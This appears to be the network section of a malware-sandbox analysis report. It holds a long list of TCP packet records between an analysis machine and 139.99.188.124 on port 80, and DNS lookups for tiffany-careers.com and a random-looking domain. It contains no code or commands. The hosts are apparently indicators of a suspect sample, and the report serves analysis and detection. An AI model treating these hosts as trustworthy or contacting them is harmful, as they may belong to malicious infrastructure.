                                                                    Dec 18, 2024 09:13:22.574886084 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.575565100 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.575579882 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.575660944 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.576356888 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.576443911 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.576488018 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.577307940 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.577441931 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.577486038 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.578141928 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.578214884 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.578263044 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.578990936 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.579191923 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.579344988 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.579863071 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.579988956 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.580174923 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.580708981 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.580826044 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.580878019 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.581532955 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.581690073 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.581731081 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.582428932 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.582549095 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.582591057 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.583283901 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.583400011 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.584182024 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.584238052 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.584250927 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.584546089 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.585002899 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.585151911 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.585268021 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.585894108 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.586000919 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.586046934 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.586756945 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.586872101 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.586915016 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.587616920 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.587737083 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.588494062 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.588551998 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.588614941 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.589365959 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.589415073 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.589471102 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.590167999 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.590233088 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.590328932 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.590372086 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.591083050 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.591186047 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.591227055 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.591960907 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.592086077 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.592123985 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.592833996 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.592951059 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.593687057 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.593740940 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.593776941 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.594460011 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.594572067 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.594664097 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.594703913 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.595418930 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.595525980 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.595565081 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.596295118 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.596411943 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.596687078 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.597168922 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.597296953 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.598041058 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.598164082 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.598198891 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.598902941 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.599011898 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.599776983 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.599838018 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.599915028 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.600033045 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.600624084 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.600737095 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.601537943 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.601665974 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.601716042 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.602379084 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.602503061 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.602551937 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.603238106 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.603343010 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.603522062 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.604106903 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.604218006 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.604269981 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.604969025 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.650837898 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.750761986 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.750873089 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.750921011 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.751166105 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.751224041 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.751322985 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.751961946 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.752100945 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.752196074 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.752876043 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.752968073 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.753089905 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.753720045 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.753849983 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.754214048 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.754693985 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.754765987 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.754818916 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.755420923 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.755543947 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.755702972 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.756335974 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.756432056 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.756531000 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.757159948 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.757278919 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.757330894 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.758044004 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.758152008 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.758246899 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.758894920 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.759030104 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.759092093 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.759776115 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.759805918 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.759912968 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.760642052 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.760755062 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.760799885 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.761526108 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.761636972 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.761722088 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.762438059 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.762506008 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.762753963 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.763241053 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.763350964 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.763487101 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.764153957 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.764242887 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.764394999 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.764965057 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.765084982 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.765139103 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.765856028 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.765964985 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.766184092 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.766699076 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.766757965 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.766830921 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.767579079 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.767676115 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.767832994 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.768450975 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.768570900 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.768826962 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.769310951 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.769409895 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.769694090 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.770176888 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.770298958 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.770379066 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.771071911 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.771182060 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.771426916 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.771918058 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.772058010 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.772162914 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.772774935 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.772896051 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.772998095 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.773644924 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.773808002 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.774168968 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.774538040 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.774635077 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.774693012 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.775376081 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.775489092 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.775548935 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.776283026 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.776366949 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.776437044 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.777112961 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.777178049 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.777244091 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.777996063 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.778100967 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.778196096 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.778861046 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.778940916 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.778992891 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.779711962 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.779918909 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.780210018 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.780566931 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.780692101 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.780880928 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.781450033 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.781577110 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.781754971 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.782316923 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.782427073 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.782561064 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.783209085 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.783304930 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.783442020 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.784044027 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.784162045 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.784198046 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.784955025 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.785113096 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.785156965 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.785795927 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.786006927 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.786060095 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.786669016 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.786780119 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.786964893 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.787564993 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.787626982 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.787779093 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.788403034 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.788501024 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.788543940 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.789271116 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.789378881 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.789444923 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.790117025 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.790236950 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.790649891 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.790981054 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.791121960 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.791177034 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.791863918 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.791970968 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.792078018 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.792736053 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.792862892 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.793203115 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.793592930 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.793709993 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.794080973 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.794496059 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.794584036 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.794725895 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.795325041 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.795437098 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.795485020 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.796174049 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.838255882 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.942024946 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.942135096 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.942229986 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.942405939 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.942547083 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.942640066 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.943289995 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.943408012 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.943459034 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.944135904 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.944278002 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.944325924 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.945966005 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.945982933 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.946027994 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.948056936 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.948072910 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.948088884 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.948105097 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.948144913 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.948170900 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.948364973 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.948527098 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.948576927 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.949136019 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.949301004 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.949352980 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.950052023 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.950397968 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.950463057 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.950588942 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.950604916 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.950639009 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.951807022 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.952003956 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.952107906 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.952756882 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.952922106 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.952965975 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.953536034 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.953725100 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.954354048 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.954406023 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.954502106 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.954561949 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.955198050 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:23.010148048 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:23.238533020 CET4972980192.168.2.5139.99.188.124
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 18, 2024 09:12:58.418391943 CET5491753192.168.2.51.1.1.1
                                                                    Dec 18, 2024 09:12:58.758760929 CET53549171.1.1.1192.168.2.5
                                                                    Dec 18, 2024 09:13:14.625849962 CET6514953192.168.2.51.1.1.1
                                                                    Dec 18, 2024 09:13:25.447237968 CET5088253192.168.2.51.1.1.1
                                                                    Dec 18, 2024 09:13:25.674781084 CET53508821.1.1.1192.168.2.5
                                                                    Dec 18, 2024 09:13:41.787744045 CET6098253192.168.2.51.1.1.1
                                                                    Dec 18, 2024 09:13:41.925384045 CET53609821.1.1.1192.168.2.5
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 18, 2024 09:12:58.418391943 CET192.168.2.51.1.1.10x1670Standard query (0)tiffany-careers.comA (IP address)IN (0x0001)false
                                                                    Dec 18, 2024 09:13:14.625849962 CET192.168.2.51.1.1.10xf3f8Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                    Dec 18, 2024 09:13:25.447237968 CET192.168.2.51.1.1.10x5207Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                    Dec 18, 2024 09:13:41.787744045 CET192.168.2.51.1.1.10xd9f7Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 18, 2024 09:12:58.758760929 CET1.1.1.1192.168.2.50x1670No error (0)tiffany-careers.com147.45.49.155A (IP address)IN (0x0001)false
